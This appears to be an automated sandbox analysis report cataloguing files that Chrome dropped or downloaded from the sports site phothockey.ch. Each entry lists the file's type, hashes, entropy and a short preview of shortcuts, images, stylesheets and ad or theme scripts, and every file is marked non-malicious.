                                                                                                                                            Preview:L..................F.@.. ...$+.,.....9e.P`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I&Zk|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Zs|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V&Zs|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V&Zs|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V&Zu|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i........... .,".....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 14:35:41 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2677
                                                                                                                                            Entropy (8bit):3.9883467640693784
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:9AEC7B290877EB17542B1142F9AAAC84
                                                                                                                                            SHA1:67941343FFBDEA04E816FF2D159A7CE5462DAA24
                                                                                                                                            SHA-256:63C98D08F98712A56008913E8B36433688C69BDD52983E4F7B4763329CA61EFB
                                                                                                                                            SHA-512:BF29E8F146C893528A988A6C00A20C26857258220822D71990F800ACC0EB674AC642DCCCB3B4B157D7241C144FEB03B249716EFB5458E12B952774204E8D43BD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:L..................F.@.. ...$+.,......w.P`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I&Zk|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Zs|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V&Zs|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V&Zs|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V&Zu|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i........... .,".....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 14:35:40 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2679
                                                                                                                                            Entropy (8bit):3.9974783414927417
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8AFDBBFBAC8B7F303F40D9208E8A844F
                                                                                                                                            SHA1:F1212F4456B72235EA51D7BD2ECBC8A93F834443
                                                                                                                                            SHA-256:E1894AC284C8177B9B0C2487610C5EF3F31AD94C88ECFDCF9BBB5AF8883D59E8
                                                                                                                                            SHA-512:C9A6FEDFA003439071C95386255F7237D555B17C8A92FEBDFCCE620B201C6A62A80B235B28B34A28EE3811AD97429F7B616D42AC2E6905234F72DC076B122A61
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:L..................F.@.. ...$+.,......\.P`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I&Zk|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Zs|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V&Zs|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V&Zs|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V&Zu|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i........... .,".....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (59458)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):114706
                                                                                                                                            Entropy (8bit):4.924852554644207
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8C9F31823282E4E056EB0AA7FAC262A9
                                                                                                                                            SHA1:DC3B1A37381E079FDA8DB59C1A9469852CD18B80
                                                                                                                                            SHA-256:3BB38D0F302677FF4104564454F60F495133579D6E6DFB722B3DE850DF596502
                                                                                                                                            SHA-512:39F239C875550BF9A31254EED1F0358EA3C6309D9FCBF6005D8852843EAF60BC20B8626D169F810A6C71B7DCDB769B8512314B89BA1FDEEA2CB3089BE9D21AE0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
                                                                                                                                            Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1881
                                                                                                                                            Entropy (8bit):6.928238800444875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:29601BBC0C8941BCD3019225D7BB8EF3
                                                                                                                                            SHA1:4566032B03E85268843590298F44EF00CC62582F
                                                                                                                                            SHA-256:DC7862A446DD32AED9C33F6A2CF7D4065316B201A2EE10BD095B80C19F53646F
                                                                                                                                            SHA-512:9F4E7C8DF308FF20C9A25EE327C65542AE10F75547C817602BA7B42B210748F7228FD6B303F5492DEBB92947AAE59BEF32D28681A6A9B58E2C91261AC63EA3B1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR... ... .....3..P....PLTE...................................................................................................................................................................................................................................................222...>>>,,,......444.......................................???...WWW)))---777;;;UUU.........ddd............$$$.........LLL............NNN...PPP...............,,,yyyzzz..."""........HHHxxxJJJ...TTTDDD..................XXXRRR......vvv...&&&...qqq...888......MMM111....................AAA......lll......KKKiii...///......ccc............444...\\\bbb((( jjj......###999'''___EEEaaaOOO........===555GGG+++...............^^^.........```~~~...FFF..................%%%333eee...sss...uuu.......[tRNS..........#-2589<@DFILQVcefikqsvxy{}.......................................................+".I....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 250 x 252, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14001
                                                                                                                                            Entropy (8bit):7.951862202249742
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B6AE3FCB13DD6D4F72AD27A80CB0983F
                                                                                                                                            SHA1:A9E571C7B06A67E08CF6FD2F4BB5574F3B4CDB6F
                                                                                                                                            SHA-256:760F680192E843566668E9768A8EB3775B79B609D68D903F7DBBEB5FA9F7D635
                                                                                                                                            SHA-512:EC77BA5006CC4BD9B871FC539A4DA68E17EDADB37F02430F83D2BAC9408FBD1B7F5EC98C00AA0384661088A724FF3AD46F2DF1915FB17A2FD48CCD4FF5B35C2C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR..............ly.....PLTE....................................ddd....................................LLL....................................%%%eee................................................SSS.........eee......bbb..................???......bbb........................................................iii...VVV...***...................................................CCCVVViiittt... (((---...............:::MMM......eeeDDD.....vvvLLL...VVV.......]]]ccc...............ttt...nnn.....................................................................................................................................................V..Q.<~..f......f......w..#m....B......O.E...T..........k..K......_....*r..........0v.].....i.a...[..c....6z....q.....P.....|..V...W................H.....tRNS..................... "%%'(()+,.1134489:;;;<>>??ABEGGHJKLMOPQSUVWXXX\\^_``bdffhhjjkllnnnoqqtvvwyz||||}.............................................................................
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (19468)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):33585
                                                                                                                                            Entropy (8bit):5.007859105847964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2E97DAC22EA076581C1B20304453EBDE
                                                                                                                                            SHA1:B31BEA9BB241F43A676AB21D635C585588CF90E1
                                                                                                                                            SHA-256:A1A459237AED93F67C679364442166E805EA96BBEA96C261B61F9AA8D7706B61
                                                                                                                                            SHA-512:C429DDAE6CCC376D53173E6FF0D36450C0F4C151EB59AB25922BC9E50FFEF4A5B931EC8D102B7B5434A9BE63DD69C50329A6C56C5EF8370C4E3716F8A2523EF8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/sports-leagues/vendor/datatables/datatables.min.css?ver=0.13.6
                                                                                                                                            Preview:/*. * This combined file was created by the DataTables downloader builder:. * https://datatables.net/download. *. * To rebuild or modify this file with the latest versions of the included. * software please visit:. * https://datatables.net/download/#dt/dt-1.13.2/b-2.3.4/b-colvis-2.3.4/fc-4.2.1. *. * Included libraries:. * DataTables 1.13.2, Buttons 2.3.4, Column visibility 2.3.4, FixedColumns 4.2.1. */..:root{--dt-row-selected: 13, 110, 253;--dt-row-selected-text: 255, 255, 255;--dt-row-selected-link: 9, 10, 11}table.dataTable td.dt-control{text-align:center;cursor:pointer}table.dataTable td.dt-control:before{height:1em;width:1em;margin-top:-9px;display:inline-block;color:white;border:.15em solid white;border-radius:1em;box-shadow:0 0 .2em #444;box-sizing:content-box;text-align:center;text-indent:0 !important;font-family:"Courier New",Courier,monospace;line-height:1em;content:"+";background-color:#31b131}table.dataTable tr.dt-hasChild td.dt-control:before{content:"-";background-c
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17454
                                                                                                                                            Entropy (8bit):6.01616195715782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D16708AB0EB500BB9A444AC7ED75FCC5
                                                                                                                                            SHA1:387C3E9327E7E2CB0CCBAF356F730E7E0DF54363
                                                                                                                                            SHA-256:8816ECEF373FF179BABFDC1CB8C0D91252EC2A48A9FFAC17EA57EF807E2C2241
                                                                                                                                            SHA-512:5DADF5E78CEE7F9C9C32804A23FC7F837DE5DDB5FEC322E473F606C58337E1F7E1225B908159B161D5FB4B019E16255BE36348163FD56947B57107171E7501ED
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:{"sodar_query_id":"vfh7Z9rfELHRjuwP3ePgiA4","injector_basename":"sodar2","bg_hash_basename":"SpkypshKgSogYQ2K2Rf8n1LXP_m6U7d6Y-cIlE_Kkgg","bg_binary":"FUn8Fabu5sP/7kjNuc2o2/9ctazQe5f0w0aCIujSgX00QiV5GdQEsO0Md4ONYtCrLznArb4HmDdFyOYOmaQbTFh6P1CvS8ZwF9NoI7hAMRlhJDw6Fa0geG1W8lXW4UotqA9QjVuXH1nIejx9zyoLZLKTDbzrKx1OxoCOEIcBNB8DSEwdF0itEIWenisVFtFiYXKxxsxacMgZg9f4yi7/frU2eJyUYaPvZFaIgm+sIDQqOV9mkkdNXXN34fHiqpqx4qWx/lkLjC3/ebR5/feH9j5M0UDUYJTSwqyKlC1/hw0NwSiiMQopAEIayO54S5UHhihkmA23AV/iaQMDBCzhCPi4visfGYtSvZksrK0xJLXwo0G8H61JQykGa9LrotHfnwoYxmAP5KWieAXh7TApSKYB7/iLQeek7c3U5OxP1sBFhcZbPSlBdpORXLwNfvfdERbMbNDaMY7B0TVBrj602HYgL+4K4cRNtExh8tOjp9UlNQCzvojiFA2Y9ltoGJQa0c2vS63R816h2zTuBAOYzaYC+V9GdwqHoG0il7I0NjRKUe5D0lvnKYS9m/iBd6xQJORv07RPJ8sl8Da5HD3239WrXY7/xy44cyLQMk6pye6WeuCqRrk7Qra//m/lvqGjc7Kme46XuKCgJqNOu8khzLugBsjCk7e2veS8L0k9niqm8KMtsbc6kSrl4flD7lvm5aEMkr8wLjTVthpmfhHNXZU8T2o4dUTWxoUnEXuGa3q1+jfQf9W/9EDOtGfe5z4FaOUPwf6lzStZeUGAnPSO/p5UB8zy0gvGkky7BId4zv9AEfooXPoZemyMTwSbYLDuv/Z2mQe5vET/ZOu4U
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3533)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):222749
                                                                                                                                            Entropy (8bit):5.453364917537705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:ADB4D93F80755314547B699C181145BD
                                                                                                                                            SHA1:87BBCFD9E29A8BBB0ED8177AEB0F930499592AB7
                                                                                                                                            SHA-256:AF6B15D8917BD5AB039B73DB5F939C17DF1ACA2ACF7D4AC9D8F44A005EDAF6D6
                                                                                                                                            SHA-512:39DD81FFB91A9340D97B77E689B06D7D45201511CDF44352F3F1406AC3FEEAF2B786ECF13F08ADD5F0725610ECC3F24B2E87D5A8518CC2818F765921A0CA626C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},da=.ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Lg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Lg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):149741
                                                                                                                                            Entropy (8bit):5.369311179888439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:BB3B39AE9D534552B5B772A8A966E240
                                                                                                                                            SHA1:C265C88D6F14BE5F3B1A54F54B61A4DCEE2FCE6F
                                                                                                                                            SHA-256:265195B99C4B69FC6E4DF429351B0A60C838F033C182CD46E4BD3689EE67E342
                                                                                                                                            SHA-512:A06ABD69276BD303524B905BD39FEC7E2562178F47377B0FC95F5755435436592B1C596981276E2FBEB6A77439A68475A7C066875CAB5D73B954107A18B6D81E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://acdn.adnxs.com/ast/ast.js
                                                                                                                                            Preview:/*! AST v0.66.0 Updated: 2024-11-18 */!function(e){var t={};function n(a){if(t[a])return t[a].exports;var r=t[a]={i:a,l:!1,exports:{}};return e[a].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,a){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:a})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var a=Object.create(null);if(n.r(a),Object.defineProperty(a,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(a,r,function(t){return e[t]}.bind(null,r));return a},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=9)}([function(e){e.exports=JSON.parse('{"o":{"UT_IFRAME
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18255
                                                                                                                                            Entropy (8bit):7.961839908723599
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E0AAF6A17A2DB6711CC49398C023D9C2
                                                                                                                                            SHA1:2EB7D8F7A830F264B5B1CFC16357F0A8652DCDF9
                                                                                                                                            SHA-256:139D3B105EAC3E66F9B54220D11E90BB11C48204A3EAEDDBE116EFCA4ECCB2FA
                                                                                                                                            SHA-512:2C6C8D9F2BA8956E2FF8D1FE48CB3DC78110BF00D94087AEA86499D57AF612B0217A5385EDD1B5C9C871BC7729BA022AD6999EE7AEC78D342FF50B1C94425E0D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............".................................................................................F.......X........5.\.G.\.,./P4......5...?......2b..u.-..-dz..[E..dR.y.....3B.tw....y6..k9.L.Y..xq.......y.....)u#....S...C.>1....M#......[.C3.s]PR})...@h...'..J.K...?z.....H.~g.....|.._N/.%..yNg.Q.|..>.....j..ZF.%._.>....[..A.{....j...i#.7..mo<.....q..u.._....|..<....N.....A.s....eNt..........A..Q....,l.PWYh.n..^Z...[c......o..w.r..q-G.> ../i.m}Pq~P..T...l...<7.V(.6...N.....=s...W./..m.m...=c..7..X...)V.Z...?...2..z...=...2...>.?.?'.-.p.K.*..FX.N........\.T[Q..A..um,1.. ..'......\W..b.|-.e..0@:....}gS....m.w4>..U,.....z.h..=~=..:k"h.MG.I..F,..y....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):170
                                                                                                                                            Entropy (8bit):5.335916817166796
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                            SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                            SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                            SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://cm.g.doubleclick.net/pixel?google_nid=toutiao_usd&google_push=AXcoOmQVt_IjAXqgWVVBaqBA9U4D1GqdpgkP9iBz0WqlJKTwRxK4HnwzJYI2y2s3kIj1g2wa0wpmA2gb1F53rrNx05YahWO7Pt9ZLa8
                                                                                                                                            Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1773
                                                                                                                                            Entropy (8bit):7.454243073246766
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:878B7951FE613EAFB572E9C7F1EACE22
                                                                                                                                            SHA1:B3947082082CB1AE241E108CBBC149D16B9C78C6
                                                                                                                                            SHA-256:6B6406C908F89498C3EA13B703E85796BF2D782CA2747964DC42C25D125F9FB6
                                                                                                                                            SHA-512:7863E6E08CE496F325FBCD5E6ECCCD5EC866519928DE35476AC6270AEB287349D331FAD315BCF87F24477F01E3B072A1CEBC5FD288FC0AD488D6163A78F67AF3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR... ... .....3..P....PLTE.......................................GG..pu...>>.......GG.77.qr.33.....9E......).Xf.......IW..+.1B..ku.:.......""v..".......n{aa......\//....U].~.......l....X^....?P..f............MXpp.............i.~...............~~.............$6....KK...p.cn....[i...Z.DT..f.V^........L[99..ry........VV..P^jj.....7@..$..........-7....)1.....g.......;G..&..q`m........'2.rr.dd..ouGG..._.8I..-.....p(({..+...LL...*<....jj.aa..SX.....l.KT..i.. ...22z.......v.xx....5F..c.|.BB......e..k..n.......$-VV.|.........dd...kx.....a..(.. ....AP.IX.co...]i..7D........er..W.#5..g.s.....jqKK....YY.>>..._.ck......R[.V[.(:...(VV.ac.}....`..(.lr;;.....S^..TZ....II....n./A.....h..g..g......................&9.....e.ao..z.GG.............@X].....tRNS......... 'DYdqIw....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210.................
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4289
                                                                                                                                            Entropy (8bit):7.7899068179826765
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D5CE043D131D15ECFD55CFEF19058C7E
                                                                                                                                            SHA1:E5343D0EEF2204BE1EE5555C9D2D87A237B1A555
                                                                                                                                            SHA-256:046F6490FC7DBB0FE20B3FC876057904DBC1BFE54E7ADAFE1B9B5D08B3268791
                                                                                                                                            SHA-512:52E8EEFCB8F3DDB7C253B731189CB2BCDD68D980871EDD09EC90A95FF2A0835DC99771BBB5A3C7FA21BE77A05C5AA4F32FAA9BE079C20DBF5EE73F6346A10A8D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d.........Z...."..................................................................................l./.r@)j.6.0RV.Z\.[.4......OV.....p$..6&`....p....N....-..[@.'.e5=.Y....oe..1cs.s..`v3...kt...A...5$..8..d.Yh.uk.....`..|.].?..|..(:..8.5......v/K.........]....+...w.^9+.v.j....g. ....-.PQ....L8.3.)V0S)..q.SQ.mZK_....Siq.*...Vv.#.....i.}.D.z...r.....+.....C...m...&.j.ia.\......*..............................!1A.. "#45..........._Q..t1z.bB......Q..V........x...F.".e%9.u.C..x.^.R.L.N.]aR.*.8+.K..Z.R.X.V.....f.1[."9a.<.Vl.1.]{.u.i.z.+.5%.iY[...=.z.U.3YwOa....U..1..l.SQ......HV=U.Vw...~D^+3..y...y|.._..H(..........gS6..<y..zA..GFt}'.F~.z..._.p..I..O..A
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1547), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1547
                                                                                                                                            Entropy (8bit):5.049422638661916
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5727732BC19CE068E44CC61FB9DED2D8
                                                                                                                                            SHA1:CB1554AD9E457BB54739900F434B62B0E31456C0
                                                                                                                                            SHA-256:0EFF32133EB996E2B45F523AC9210D4B408F34E05868E592112F9ABC322306EB
                                                                                                                                            SHA-512:FFA661F725C1783E2CB209CA2A755A14C75A152CADDB77575B564B4D5CF6EB62382F2B9725D4370A7A4B1FBF9BA5A6277B5610B5857F3401FAE4D3A2717870C0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/js/navigation.min.js?ver=4.1.12
                                                                                                                                            Preview:!function(){var e,a,t,s,n,i;if((e=document.getElementById("cm-primary-nav"))&&void 0!==(a=e.getElementsByClassName("cm-menu-toggle")[0]))if(void 0!==(t=e.getElementsByTagName("ul")[0])){for(t.setAttribute("aria-expanded","false"),-1===t.className.indexOf("nav-menu")&&(t.className+="nav-menu"),a.onclick=function(){-1!==e.className.indexOf("cm-mobile-nav")?(e.className=e.className.replace("cm-mobile-nav","cm-primary-nav"),a.setAttribute("aria-expanded","false"),t.setAttribute("aria-expanded","false")):(e.className=e.className.replace("cm-primary-nav","cm-mobile-nav"),a.setAttribute("aria-expanded","true"),t.setAttribute("aria-expanded","true"))},n=0,i=(s=t.getElementsByTagName("a")).length;n<i;n++)s[n].addEventListener("focus",c,!0),s[n].addEventListener("blur",c,!0);!function(e){var a,t,s=e.querySelectorAll(".menu-item-has-children > a, .page_item_has_children > a");if("ontouchstart"in window&&window.matchMedia("(min-width: 768px)").matches)for(a=function(e){var a,t=this.parentNode;if(t
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (43087)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):43126
                                                                                                                                            Entropy (8bit):5.407654863523304
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E6F430CBC7A8DC5D83F0C8EB1472A81F
                                                                                                                                            SHA1:58398B8CA7DDF501071ADC888D2D72D1EF4DAD71
                                                                                                                                            SHA-256:1CD03E5224865B618D82386028B8E2434A318437AF49AB0B29146E2B0005C0F2
                                                                                                                                            SHA-512:1CBA78225E4C8D49E99A944ADF0FAE59C10E2F3D56182B33E4602F9D26CD025ACEBFF7F4EA6B4877DA37EAB3EEA3A5CDD3DFB103BD4961B9CCE790A3AC1639FA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.5.6
